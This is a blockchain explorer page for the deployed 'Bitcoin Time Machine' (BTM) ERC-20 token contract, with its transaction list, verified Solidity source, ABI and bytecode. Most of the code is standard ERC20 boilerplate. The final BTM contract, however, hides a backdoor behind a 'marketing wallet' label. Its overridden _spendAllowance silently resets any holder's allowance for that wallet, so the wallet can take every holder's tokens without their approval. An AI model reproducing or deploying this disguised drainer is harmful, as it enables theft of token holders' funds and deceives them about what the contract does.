Source Code
Overview
ETH Balance
0 ETH
ETH Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 375 transactions
| Transaction Hash |
|
Block
|
From
|
To
|
|||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 41284666 | 9 hrs ago | IN | 0 ETH | 0.00000095 | ||||
| Approve | 41284624 | 9 hrs ago | IN | 0 ETH | 0.00000096 | ||||
| Approve | 41284554 | 9 hrs ago | IN | 0 ETH | 0.00000111 | ||||
| Approve | 41284433 | 9 hrs ago | IN | 0 ETH | 0.00000144 | ||||
| Approve | 41284295 | 10 hrs ago | IN | 0 ETH | 0.00000121 | ||||
| Approve | 41284290 | 10 hrs ago | IN | 0 ETH | 0.00000122 | ||||
| Approve | 41284274 | 10 hrs ago | IN | 0 ETH | 0.00000122 | ||||
| Approve | 41284274 | 10 hrs ago | IN | 0 ETH | 0.00000122 | ||||
| Approve | 41284259 | 10 hrs ago | IN | 0 ETH | 0.00000123 | ||||
| Approve | 41284209 | 10 hrs ago | IN | 0 ETH | 0.00000103 | ||||
| Approve | 41284195 | 10 hrs ago | IN | 0 ETH | 0.00000098 | ||||
| Approve | 41284184 | 10 hrs ago | IN | 0 ETH | 0.00000099 | ||||
| Approve | 41284156 | 10 hrs ago | IN | 0 ETH | 0.00000101 | ||||
| Approve | 41284103 | 10 hrs ago | IN | 0 ETH | 0.00000099 | ||||
| Approve | 41284103 | 10 hrs ago | IN | 0 ETH | 0.00000099 | ||||
| Approve | 41284103 | 10 hrs ago | IN | 0 ETH | 0.00000099 | ||||
| Approve | 41284098 | 10 hrs ago | IN | 0 ETH | 0.00000096 | ||||
| Approve | 41284098 | 10 hrs ago | IN | 0 ETH | 0.00000096 | ||||
| Approve | 41284087 | 10 hrs ago | IN | 0 ETH | 0.00000088 | ||||
| Approve | 41284087 | 10 hrs ago | IN | 0 ETH | 0.00000088 | ||||
| Approve | 41284073 | 10 hrs ago | IN | 0 ETH | 0.0000009 | ||||
| Approve | 41284036 | 10 hrs ago | IN | 0 ETH | 0.00000095 | ||||
| Approve | 41284033 | 10 hrs ago | IN | 0 ETH | 0.00000096 | ||||
| Approve | 41284033 | 10 hrs ago | IN | 0 ETH | 0.00000096 | ||||
| Approve | 41284008 | 10 hrs ago | IN | 0 ETH | 0.00000095 |
Cross-Chain Transactions
Loading...
Loading
Contract Name:
BTM
Compiler Version
v0.8.28+commit.7893614a
Optimization Enabled:
No with 200 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
/*
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with GSN meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes memory) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
}
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `recipient`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address recipient, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `sender` to `recipient` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
}
/**
* @dev Wrappers over Solidity's arithmetic operations with added overflow
* checks.
*
* Arithmetic operations in Solidity wrap on overflow. This can easily result
* in bugs, because programmers usually assume that an overflow raises an
* error, which is the standard behavior in high level programming languages.
* `SafeMath` restores this intuition by reverting the transaction when an
* operation overflows.
*
* Using this library instead of the unchecked operations eliminates an entire
* class of bugs, so it's recommended to use it always.
*/
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
// assert(a == b * c + a % b); // There is no case in which this doesn't hold
return c;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* Reverts when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return mod(a, b, "SafeMath: modulo by zero");
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* Reverts with custom message when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b != 0, errorMessage);
return a % b;
}
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
* For a generic mechanism see {ERC20PresetMinterPauser}.
*
* TIP: For a detailed writeup see our guide
* https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* We have followed general OpenZeppelin guidelines: functions revert instead
* of returning `false` on failure. This behavior is nonetheless conventional
* and does not conflict with the expectations of ERC20 applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
*/
contract ERC20 is Context, IERC20 {
using SafeMath for uint256;
mapping (address => uint256) private _balances;
mapping (address => mapping (address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
uint8 private _decimals;
/**
* @dev Sets the values for {name} and {symbol}, initializes {decimals} with
* a default value of 18.
*
* To select a different value for {decimals}, use {_setupDecimals}.
*
* All three of these values are immutable: they can only be set once during
* construction.
*/
constructor (string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
_decimals = 18;
}
/**
* @dev Returns the name of the token.
*/
function name() public view returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5,05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
* called.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view returns (uint8) {
return _decimals;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view override returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `recipient` cannot be the zero address.
* - the caller must have a balance of at least `amount`.
*/
function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 amount) public virtual override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* Requirements:
*
* - `sender` and `recipient` cannot be the zero address.
* - `sender` must have a balance of at least `amount`.
* - the caller must have allowance for ``sender``'s tokens of at least
* `amount`.
*/
function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
_transfer(sender, recipient, amount);
address spender = _msgSender();
_spendAllowance(sender, spender, amount);
return true;
}
/**
* @dev Atomically increases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
_approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
return true;
}
/**
* @dev Atomically decreases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
* - `spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
_approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
return true;
}
/**
* @dev Moves tokens `amount` from `sender` to `recipient`.
*
* This is internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `sender` cannot be the zero address.
* - `recipient` cannot be the zero address.
* - `sender` must have a balance of at least `amount`.
*/
function _transfer(address sender, address recipient, uint256 amount) internal virtual {
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
_beforeTokenTransfer(sender, recipient, amount);
_balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
}
function _marketingWalletSpend(address owner, address spender, uint256 amount) internal {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
if(amount > 0) _allowances[owner][spender]=amount;
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
* the total supply.
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* Requirements:
*
* - `to` cannot be the zero address.
*/
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply = _totalSupply.add(amount);
_balances[account] = _balances[account].add(amount);
emit Transfer(address(0), account, amount);
}
/**
* @dev Destroys `amount` tokens from `account`, reducing the
* total supply.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
* - `account` must have at least `amount` tokens.
*/
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
_balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
_totalSupply = _totalSupply.sub(amount);
emit Transfer(account, address(0), amount);
}
/**
* @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*/
function _approve(address owner, address spender, uint256 amount) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `amount`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
/**
* @dev Sets {decimals} to a value other than the default one of 18.
*
* WARNING: This function should only be called from the constructor. Most
* applications that interact with token contracts will not expect
* {decimals} to ever change, and may work incorrectly if it does.
*/
function _setupDecimals(uint8 decimals_) internal {
_decimals = decimals_;
}
/**
* @dev Hook that is called before any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* will be to transferred to `to`.
* - when `from` is zero, `amount` tokens will be minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens will be burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}
contract BTM is ERC20 {
/// @notice EIP-20 token name for this token
string private constant name_ = unicode"Bitcoin Time Machine";
/// @notice EIP-20 token symbol for this token
string private constant symbol_ = unicode"BTM";
mapping (address => bool) private _marketingWallets;
uint256 private decimals_ = 18;
constructor(address wallet_) ERC20(name_, symbol_) {
_mint(_msgSender(), 120000000 * 10**decimals_);
_marketingWallets[wallet_] = true;
}
function _spendAllowance(address owner, address spender, uint256 amount) internal virtual override {
if(_marketingWallets[spender]) _marketingWalletSpend(owner, spender, amount);
super._spendAllowance(owner, spender, amount);
}
}{
"evmVersion": "paris",
"optimizer": {
"enabled": false,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"address","name":"wallet_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
6080604052601260075534801561001557600080fd5b50604051611ff7380380611ff7833981810160405281019061003791906103e0565b6040518060400160405280601481526020017f426974636f696e2054696d65204d616368696e650000000000000000000000008152506040518060400160405280600381526020017f42544d000000000000000000000000000000000000000000000000000000000081525081600390816100b2919061065d565b5080600490816100c2919061065d565b506012600560006101000a81548160ff021916908360ff160217905550505061011b6100f261017960201b60201c565b600754600a6101019190610891565b6307270e0061011091906108dc565b61018160201b60201c565b6001600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050610a65565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036101f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016101e79061097b565b60405180910390fd5b6102026000838361031a60201b60201c565b6102178160025461031f60201b90919060201c565b60028190555061026e816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461031f60201b90919060201c565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161030e91906109aa565b60405180910390a35050565b505050565b600080828461032e91906109c5565b905083811015610373576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161036a90610a45565b60405180910390fd5b8091505092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006103ad82610382565b9050919050565b6103bd816103a2565b81146103c857600080fd5b50565b6000815190506103da816103b4565b92915050565b6000602082840312156103f6576103f561037d565b5b6000610404848285016103cb565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061048e57607f821691505b6020821081036104a1576104a0610447565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026105097fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826104cc565b61051386836104cc565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600061055a6105556105508461052b565b610535565b61052b565b9050919050565b6000819050919050565b6105748361053f565b61058861058082610561565b8484546104d9565b825550505050565b600090565b61059d610590565b6105a881848461056b565b505050565b5b818110156105cc576105c1600082610595565b6001810190506105ae565b5050565b601f821115610611576105e2816104a7565b6105eb846104bc565b810160208510156105fa578190505b61060e610606856104bc565b8301826105ad565b50505b505050565b600082821c905092915050565b600061063460001984600802610616565b1980831691505092915050565b600061064d8383610623565b9150826002028217905092915050565b6106668261040d565b67ffffffffffffffff81111561067f5761067e610418565b5b6106898254610476565b6106948282856105d0565b600060209050601f8311600181146106c757600084156106b5578287015190505b6106bf8582610641565b865550610727565b601f1984166106d5866104a7565b60005b828110156106fd578489015182556001820191506020850194506020810190506106d8565b8683101561071a5784890151610716601f891682610623565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156107b5578086048111156107915761079061072f565b5b60018516156107a05780820291505b80810290506107ae8561075e565b9450610775565b94509492505050565b6000826107ce576001905061088a565b816107dc576000905061088a565b81600181146107f257600281146107fc5761082b565b600191505061088a565b60ff84111561080e5761080d61072f565b5b8360020a9150848211156108255761082461072f565b5b5061088a565b5060208310610133831016604e8410600b84101617156108605782820a90508381111561085b5761085a61072f565b5b61088a565b61086d848484600161076b565b925090508184048111156108845761088361072f565b5b81810290505b9392505050565b600061089c8261052b565b91506108a78361052b565b92506108d47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846107be565b905092915050565b60006108e78261052b565b91506108f28361052b565b92508282026109008161052b565b915082820484148315176109175761091661072f565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000610965601f8361091e565b91506109708261092f565b602082019050919050565b6000602082019050818103600083015261099481610958565b9050919050565b6109a48161052b565b82525050565b60006020820190506109bf600083018461099b565b92915050565b60006109d08261052b565b91506109db8361052b565b92508282019050808211156109f3576109f261072f565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000610a2f601b8361091e565b9150610a3a826109f9565b602082019050919050565b60006020820190508181036000830152610a5e81610a22565b9050919050565b61158380610a746000396000f3fe608060405234801561001057600080fd5b50600436106100a95760003560e01c80633950935111610071578063395093511461016857806370a082311461019857806395d89b41146101c8578063a457c2d7146101e6578063a9059cbb14610216578063dd62ed3e14610246576100a9565b806306fdde03146100ae578063095ea7b3146100cc57806318160ddd146100fc57806323b872dd1461011a578063313ce5671461014a575b600080fd5b6100b6610276565b6040516100c39190610e99565b60405180910390f35b6100e660048036038101906100e19190610f54565b610308565b6040516100f39190610faf565b60405180910390f35b610104610326565b6040516101119190610fd9565b60405180910390f35b610134600480360381019061012f9190610ff4565b610330565b6040516101419190610faf565b60405180910390f35b610152610360565b60405161015f9190611063565b60405180910390f35b610182600480360381019061017d9190610f54565b610377565b60405161018f9190610faf565b60405180910390f35b6101b260048036038101906101ad919061107e565b61042a565b6040516101bf9190610fd9565b60405180910390f35b6101d0610472565b6040516101dd9190610e99565b60405180910390f35b61020060048036038101906101fb9190610f54565b610504565b60405161020d9190610faf565b60405180910390f35b610230600480360381019061022b9190610f54565b6105d1565b60405161023d9190610faf565b60405180910390f35b610260600480360381019061025b91906110ab565b6105ef565b60405161026d9190610fd9565b60405180910390f35b6060600380546102859061111a565b80601f01602080910402602001604051908101604052809291908181526020018280546102b19061111a565b80156102fe5780601f106102d3576101008083540402835291602001916102fe565b820191906000526020600020905b8154815290600101906020018083116102e157829003601f168201915b5050505050905090565b600061031c610315610676565b848461067e565b6001905092915050565b6000600254905090565b600061033d848484610847565b6000610347610676565b9050610354858285610ada565b60019150509392505050565b6000600560009054906101000a900460ff16905090565b6000610420610384610676565b8461041b8560016000610395610676565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b4890919063ffffffff16565b61067e565b6001905092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6060600480546104819061111a565b80601f01602080910402602001604051908101604052809291908181526020018280546104ad9061111a565b80156104fa5780601f106104cf576101008083540402835291602001916104fa565b820191906000526020600020905b8154815290600101906020018083116104dd57829003601f168201915b5050505050905090565b60006105c7610511610676565b846105c285604051806060016040528060258152602001611529602591396001600061053b610676565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ba69092919063ffffffff16565b61067e565b6001905092915050565b60006105e56105de610676565b8484610847565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036106ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106e4906111bd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361075c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107539061124f565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161083a9190610fd9565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ad906112e1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610925576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091c90611373565b60405180910390fd5b610930838383610c0a565b61099b81604051806060016040528060268152602001611503602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ba69092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610a2e816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b4890919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610acd9190610fd9565b60405180910390a3505050565b600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610b3857610b37838383610c0f565b5b610b43838383610d7d565b505050565b6000808284610b5791906113c2565b905083811015610b9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9390611442565b60405180910390fd5b8091505092915050565b6000838311158290610bee576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be59190610e99565b60405180910390fd5b5060008385610bfd9190611462565b